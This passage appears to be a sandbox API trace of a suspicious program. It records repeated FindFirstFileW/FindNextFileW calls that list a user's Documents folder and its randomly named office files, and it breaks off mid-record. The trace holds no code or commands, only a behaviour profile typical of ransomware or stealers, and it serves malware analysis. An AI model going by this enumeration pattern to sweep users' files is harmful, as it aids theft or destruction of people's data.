FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x645e88d0, ftCreationTime.dwHighDateTime=0x1d4cb56, ftLastAccessTime.dwLowDateTime=0xf8369ef0, ftLastAccessTime.dwHighDateTime=0x1d4cb6d, ftLastWriteTime.dwLowDateTime=0xf8369ef0, ftLastWriteTime.dwHighDateTime=0x1d4cb6d, nFileSizeHigh=0x0, nFileSizeLow=0x6c63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OZlfj3nx.csv", cAlternateFileName="")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa1ee40, ftCreationTime.dwHighDateTime=0x1d5373c, ftLastAccessTime.dwLowDateTime=0x228c34c0, ftLastAccessTime.dwHighDateTime=0x1d51764, ftLastWriteTime.dwLowDateTime=0x228c34c0, ftLastWriteTime.dwHighDateTime=0x1d51764, nFileSizeHigh=0x0, nFileSizeLow=0x15f55, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRrY7K.xlsx", cAlternateFileName="RRRY7K~1.XLS")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecbace60, ftCreationTime.dwHighDateTime=0x1d4bddb, ftLastAccessTime.dwLowDateTime=0x84b3d660, ftLastAccessTime.dwHighDateTime=0x1d4d9ea, ftLastWriteTime.dwLowDateTime=0x84b3d660, ftLastWriteTime.dwHighDateTime=0x1d4d9ea, nFileSizeHigh=0x0, nFileSizeLow=0xcad7, dwReserved0=0x0, dwReserved1=0x0, cFileName="tKkd.docx", cAlternateFileName="TKKD~1.DOC")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1363930, ftCreationTime.dwHighDateTime=0x1d4c9c8, ftLastAccessTime.dwLowDateTime=0x40a3d40, ftLastAccessTime.dwHighDateTime=0x1d4d33e, ftLastWriteTime.dwLowDateTime=0x40a3d40, ftLastWriteTime.dwHighDateTime=0x1d4d33e, nFileSizeHigh=0x0, nFileSizeLow=0x11b61, dwReserved0=0x0, dwReserved1=0x0, cFileName="wQbo.ods", cAlternateFileName="")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x417488a0, ftCreationTime.dwHighDateTime=0x1d4c670, ftLastAccessTime.dwLowDateTime=0x4a946b10, ftLastAccessTime.dwHighDateTime=0x1d4d5b3, ftLastWriteTime.dwLowDateTime=0x4a946b10, ftLastWriteTime.dwHighDateTime=0x1d4d5b3, nFileSizeHigh=0x0, nFileSizeLow=0x23b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWhGoLhk8TzOpVmq1.csv", cAlternateFileName="WWHGOL~1.CSV")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bba150, ftCreationTime.dwHighDateTime=0x1d4fbf0, ftLastAccessTime.dwLowDateTime=0x3939010, ftLastAccessTime.dwHighDateTime=0x1d52081, ftLastWriteTime.dwLowDateTime=0x3939010, ftLastWriteTime.dwHighDateTime=0x1d52081, nFileSizeHigh=0x0, nFileSizeLow=0x11ce8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y0f8W8Ps2fInLd97.pptx", cAlternateFileName="Y0F8W8~1.PPT")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf606fb60, ftCreationTime.dwHighDateTime=0x1d51574, ftLastAccessTime.dwLowDateTime=0xb20f6250, ftLastAccessTime.dwHighDateTime=0x1d4df99, ftLastWriteTime.dwLowDateTime=0xb20f6250, ftLastWriteTime.dwHighDateTime=0x1d4df99, nFileSizeHigh=0x0, nFileSizeLow=0x54df, dwReserved0=0x0, dwReserved1=0x0, cFileName="y_f_n F2Mg6yklJf0LC.pptx", cAlternateFileName="Y_F_NF~1.PPT")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b8334a0, ftCreationTime.dwHighDateTime=0x1d51db5, ftLastAccessTime.dwLowDateTime=0x47771b40, ftLastAccessTime.dwHighDateTime=0x1d4b974, ftLastWriteTime.dwLowDateTime=0x47771b40, ftLastWriteTime.dwHighDateTime=0x1d4b974, nFileSizeHigh=0x0, nFileSizeLow=0x9032, dwReserved0=0x0, dwReserved1=0x0, cFileName="z0uuBt3LxozCdl4TPm0.docx", cAlternateFileName="Z0UUBT~1.DOC")) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0038.697] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0038.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0038.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0038.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0038.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpFilePart=0x0) returned 0x28 [0038.697] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x179406a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x179406a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.697] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x179406a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x179406a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40238fb0, ftCreationTime.dwHighDateTime=0x1d50aad, ftLastAccessTime.dwLowDateTime=0x85834890, ftLastAccessTime.dwHighDateTime=0x1d4c758, ftLastWriteTime.dwLowDateTime=0x85834890, ftLastWriteTime.dwHighDateTime=0x1d4c758, nFileSizeHigh=0x0, nFileSizeLow=0x7cbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="1pX_gB60 0bE4d3dn.pptx", cAlternateFileName="1PX_GB~1.PPT")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66aa62b0, ftCreationTime.dwHighDateTime=0x1d4cb58, ftLastAccessTime.dwLowDateTime=0xd3615330, ftLastAccessTime.dwHighDateTime=0x1d4d3b1, ftLastWriteTime.dwLowDateTime=0xd3615330, ftLastWriteTime.dwHighDateTime=0x1d4d3b1, nFileSizeHigh=0x0, nFileSizeLow=0x89f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="2vaMuPlZ6I8mh4S.docx", cAlternateFileName="2VAMUP~1.DOC")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b84e000, ftCreationTime.dwHighDateTime=0x1d4c946, ftLastAccessTime.dwLowDateTime=0x8d0bb710, ftLastAccessTime.dwHighDateTime=0x1d4ce14, ftLastWriteTime.dwLowDateTime=0x8d0bb710, ftLastWriteTime.dwHighDateTime=0x1d4ce14, nFileSizeHigh=0x0, nFileSizeLow=0xcdf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="5Vv FMKnuQagvr1v.odt", cAlternateFileName="5VVFMK~1.ODT")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361e0cb0, ftCreationTime.dwHighDateTime=0x1d53498, ftLastAccessTime.dwLowDateTime=0x564bee80, ftLastAccessTime.dwHighDateTime=0x1d53088, ftLastWriteTime.dwLowDateTime=0x564bee80, ftLastWriteTime.dwHighDateTime=0x1d53088, nFileSizeHigh=0x0, nFileSizeLow=0x17328, dwReserved0=0x0, dwReserved1=0x0, cFileName="at0FaHyq.pptx", cAlternateFileName="AT0FAH~1.PPT")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca6de50, ftCreationTime.dwHighDateTime=0x1d4cdc6, ftLastAccessTime.dwLowDateTime=0x522ef980, ftLastAccessTime.dwHighDateTime=0x1d4b213, ftLastWriteTime.dwLowDateTime=0x522ef980, ftLastWriteTime.dwHighDateTime=0x1d4b213, nFileSizeHigh=0x0, nFileSizeLow=0xd08f, dwReserved0=0x0, dwReserved1=0x0, cFileName="c-OUqwNcpwZKsqZUKU.docx", cAlternateFileName="C-OUQW~1.DOC")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7702460, ftCreationTime.dwHighDateTime=0x1d4d27c, ftLastAccessTime.dwLowDateTime=0xf59aa830, ftLastAccessTime.dwHighDateTime=0x1d4c9c9, ftLastWriteTime.dwLowDateTime=0xf59aa830, ftLastWriteTime.dwHighDateTime=0x1d4c9c9, nFileSizeHigh=0x0, nFileSizeLow=0x70fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="CcxLxbYA5PVQheLVcI.ppt", cAlternateFileName="CCXLXB~1.PPT")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a569030, ftCreationTime.dwHighDateTime=0x1d5041a, ftLastAccessTime.dwLowDateTime=0x759d1ed0, ftLastAccessTime.dwHighDateTime=0x1d4e551, ftLastWriteTime.dwLowDateTime=0x759d1ed0, ftLastWriteTime.dwHighDateTime=0x1d4e551, nFileSizeHigh=0x0, nFileSizeLow=0x3eff, dwReserved0=0x0, dwReserved1=0x0, cFileName="DihjpK.docx", cAlternateFileName="DIHJPK~1.DOC")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93b0a350, ftCreationTime.dwHighDateTime=0x1d52625, ftLastAccessTime.dwLowDateTime=0x75119b20, ftLastAccessTime.dwHighDateTime=0x1d50c76, ftLastWriteTime.dwLowDateTime=0x75119b20, ftLastWriteTime.dwHighDateTime=0x1d50c76, nFileSizeHigh=0x0, nFileSizeLow=0x13f35, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dkou zZ n2_BH1.xlsx", cAlternateFileName="DKOUZZ~1.XLS")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x684a36a0, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x8821f340, ftLastAccessTime.dwHighDateTime=0x1d4ce32, ftLastWriteTime.dwLowDateTime=0x8821f340, ftLastWriteTime.dwHighDateTime=0x1d4ce32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUU-xXmHIRDJW4 2Zx56", cAlternateFileName="EUU-XX~1")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb7600d0, ftCreationTime.dwHighDateTime=0x1d4c0e5, ftLastAccessTime.dwLowDateTime=0xaedc5c30, ftLastAccessTime.dwHighDateTime=0x1d4e67b, ftLastWriteTime.dwLowDateTime=0xaedc5c30, ftLastWriteTime.dwHighDateTime=0x1d4e67b, nFileSizeHigh=0x0, nFileSizeLow=0x16c36, dwReserved0=0x0, dwReserved1=0x0, cFileName="fKdo0m3dDNNLylacs0H.xlsx", cAlternateFileName="FKDO0M~1.XLS")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77298290, ftCreationTime.dwHighDateTime=0x1d51461, ftLastAccessTime.dwLowDateTime=0x1c284890, ftLastAccessTime.dwHighDateTime=0x1d4b2af, ftLastWriteTime.dwLowDateTime=0x1c284890, ftLastWriteTime.dwHighDateTime=0x1d4b2af, nFileSizeHigh=0x0, nFileSizeLow=0x6eef, dwReserved0=0x0, dwReserved1=0x0, cFileName="I5LVn7OvnVGp4I.xlsx", cAlternateFileName="I5LVN7~1.XLS")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb167c870, ftCreationTime.dwHighDateTime=0x1d4fe29, ftLastAccessTime.dwLowDateTime=0x39f67c0, ftLastAccessTime.dwHighDateTime=0x1d4c43b, ftLastWriteTime.dwLowDateTime=0x39f67c0, ftLastWriteTime.dwHighDateTime=0x1d4c43b, nFileSizeHigh=0x0, nFileSizeLow=0x13418, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPNdEKyG-iF8dd5Hv.xlsx", cAlternateFileName="KSPNDE~1.XLS")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x357d5ff0, ftCreationTime.dwHighDateTime=0x1d4cfbb, ftLastAccessTime.dwLowDateTime=0xb6c0e340, ftLastAccessTime.dwHighDateTime=0x1d4d2f2, ftLastWriteTime.dwLowDateTime=0xb6c0e340, ftLastWriteTime.dwHighDateTime=0x1d4d2f2, nFileSizeHigh=0x0, nFileSizeLow=0x27a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="L88LW6Qd.ods", cAlternateFileName="")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf6c2a0, ftCreationTime.dwHighDateTime=0x1d4f49e, ftLastAccessTime.dwLowDateTime=0x2ac14be0, ftLastAccessTime.dwHighDateTime=0x1d4bec6, ftLastWriteTime.dwLowDateTime=0x2ac14be0, ftLastWriteTime.dwHighDateTime=0x1d4bec6, nFileSizeHigh=0x0, nFileSizeLow=0x69b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="m7dOR-18S 2XvaRj3rX9.pptx", cAlternateFileName="M7DOR-~1.PPT")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab4e8f0, ftCreationTime.dwHighDateTime=0x1d52638, ftLastAccessTime.dwLowDateTime=0xe6655320, ftLastAccessTime.dwHighDateTime=0x1d526d4, ftLastWriteTime.dwLowDateTime=0xe6655320, ftLastWriteTime.dwHighDateTime=0x1d526d4, nFileSizeHigh=0x0, nFileSizeLow=0x15b41, dwReserved0=0x0, dwReserved1=0x0, cFileName="MUl3j_Wys.docx", cAlternateFileName="MUL3J_~1.DOC")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x645e88d0, ftCreationTime.dwHighDateTime=0x1d4cb56, ftLastAccessTime.dwLowDateTime=0xf8369ef0, ftLastAccessTime.dwHighDateTime=0x1d4cb6d, ftLastWriteTime.dwLowDateTime=0xf8369ef0, ftLastWriteTime.dwHighDateTime=0x1d4cb6d, nFileSizeHigh=0x0, nFileSizeLow=0x6c63, dwReserved0=0x0, dwReserved1=0x0, cFileName="OZlfj3nx.csv", cAlternateFileName="")) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa1ee40, ftCreationTime.dwHighDateTime=0x1d5373c, ftLastAccessTime.dwLowDateTime=0x228c34c0, ftLastAccessTime.dwHighDateTime=0x1d51764, ftLastWriteTime.dwLowDateTime=0x228c34c0, ftLastWriteTime.dwHighDateTime=0x1d51764, nFileSizeHigh=0x0, nFileSizeLow=0x15f55, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRrY7K.xlsx", cAlternateFileName="RRRY7K~1.XLS")) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecbace60, ftCreationTime.dwHighDateTime=0x1d4bddb, ftLastAccessTime.dwLowDateTime=0x84b3d660, ftLastAccessTime.dwHighDateTime=0x1d4d9ea, ftLastWriteTime.dwLowDateTime=0x84b3d660, ftLastWriteTime.dwHighDateTime=0x1d4d9ea, nFileSizeHigh=0x0, nFileSizeLow=0xcad7, dwReserved0=0x0, dwReserved1=0x0, cFileName="tKkd.docx", cAlternateFileName="TKKD~1.DOC")) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1363930, ftCreationTime.dwHighDateTime=0x1d4c9c8, ftLastAccessTime.dwLowDateTime=0x40a3d40, ftLastAccessTime.dwHighDateTime=0x1d4d33e, ftLastWriteTime.dwLowDateTime=0x40a3d40, ftLastWriteTime.dwHighDateTime=0x1d4d33e, nFileSizeHigh=0x0, nFileSizeLow=0x11b61, dwReserved0=0x0, dwReserved1=0x0, cFileName="wQbo.ods", cAlternateFileName="")) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x417488a0, ftCreationTime.dwHighDateTime=0x1d4c670, ftLastAccessTime.dwLowDateTime=0x4a946b10, ftLastAccessTime.dwHighDateTime=0x1d4d5b3, ftLastWriteTime.dwLowDateTime=0x4a946b10, ftLastWriteTime.dwHighDateTime=0x1d4d5b3, nFileSizeHigh=0x0, nFileSizeLow=0x23b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWhGoLhk8TzOpVmq1.csv", cAlternateFileName="WWHGOL~1.CSV")) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bba150, ftCreationTime.dwHighDateTime=0x1d4fbf0, ftLastAccessTime.dwLowDateTime=0x3939010, ftLastAccessTime.dwHighDateTime=0x1d52081, ftLastWriteTime.dwLowDateTime=0x3939010, ftLastWriteTime.dwHighDateTime=0x1d52081, nFileSizeHigh=0x0, nFileSizeLow=0x11ce8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y0f8W8Ps2fInLd97.pptx", cAlternateFileName="Y0F8W8~1.PPT")) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf606fb60, ftCreationTime.dwHighDateTime=0x1d51574, ftLastAccessTime.dwLowDateTime=0xb20f6250, ftLastAccessTime.dwHighDateTime=0x1d4df99, ftLastWriteTime.dwLowDateTime=0xb20f6250, ftLastWriteTime.dwHighDateTime=0x1d4df99, nFileSizeHigh=0x0, nFileSizeLow=0x54df, dwReserved0=0x0, dwReserved1=0x0, cFileName="y_f_n F2Mg6yklJf0LC.pptx", 